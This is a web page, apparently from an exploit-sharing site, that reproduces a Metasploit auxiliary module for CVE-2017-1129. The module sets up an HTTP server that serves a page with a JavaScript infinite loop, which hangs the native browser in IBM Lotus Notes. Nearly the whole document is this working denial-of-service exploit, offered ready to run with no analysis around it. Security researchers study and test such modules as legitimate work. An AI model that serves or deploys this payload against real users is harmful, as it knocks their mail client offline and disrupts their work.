扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer def initialize(info = {}) super( update_info( info, 'Name' => "IBM Notes encodeURI DOS", 'Description'=> %q( This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. If successful, it could cause the Notes client to hang and have to be restarted. ), 'License'=> MSF_LICENSE, 'Author' => [ 'Dhiraj Mishra', ], 'References' => [ [ 'EXPLOIT-DB', '42602'], [ 'CVE', '2017-1129' ], [ 'URL', ' http://www-01.ibm.com/support/docview.wss?uid=swg21999385' ] ], 'DisclosureDate' => 'Aug 31 2017', 'Actions'=> [[ 'WebServer' ]], 'PassiveActions' => [ 'WebServer' ], 'DefaultAction'=> 'WebServer' ) ) end def run exploit # start http server end def setup @html = %| <html><head><title>DOS</title> <script type="text/javascript"> while (true) try { var object = { }; function d(d0) { var d0 = (object instanceof encodeURI)('foo'); } d(75); } catch (d) { } </script> </head></html> | end def on_request_uri(cli, _request) print_status('Sending response') send_response(cli, @html) end end |
体验盒子
